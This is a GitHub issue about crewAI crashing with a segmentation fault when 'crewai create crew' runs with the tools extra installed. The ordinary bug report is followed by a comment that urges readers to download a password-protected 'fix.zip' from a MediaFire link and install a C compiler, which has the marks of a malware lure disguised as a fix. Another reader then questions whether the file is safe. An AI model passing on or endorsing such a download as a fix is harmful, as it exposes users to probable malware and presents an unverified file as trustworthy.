crewAIInc / crewAI

Framework for orchestrating role-playing, autonomous AI agents. By fostering collaborative intelligence, CrewAI empowers agents to work together seamlessly, tackling complex tasks.
https://crewai.com
MIT License
19.66k stars 2.72k forks source link

[BUG] The use of crewai['tools'] results in a segmentation fault when running crewai create crew. #1366

Open SacMV opened 3 days ago

SacMV commented 3 days ago

Description

I'm trying to create a project with crewai['tools'] (crewai = {extras = ["tools"], version = "0.65.2"}), but I'm encountering this issue. It works fine if I only use crewai without the extras tools.

Steps to Reproduce

  1. Successfully installed crewai['tools'] without any errors.
  2. Running crewai create crew test-agent results in a segmentation fault: crewai create crew test-agent.

Expected behavior

"Project created successfully."

Screenshots/Code snippets

Screen Shot 2024-09-29 at 08 51 58

Operating System

macOS Big Sur

Python Version

3.12

crewAI Version

0.65.2

crewAI Tools Version

0.12.1

Virtual Environment

Poetry

Evidence

Screen Shot 2024-09-29 at 08 51 58

Possible Solution

None

Additional context

"Starting project initialization."

SacMV commented 3 days ago

install this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme If you don't have the c compliator, install it.(gcc or clang)

What kind of file is that? I feel it's not safe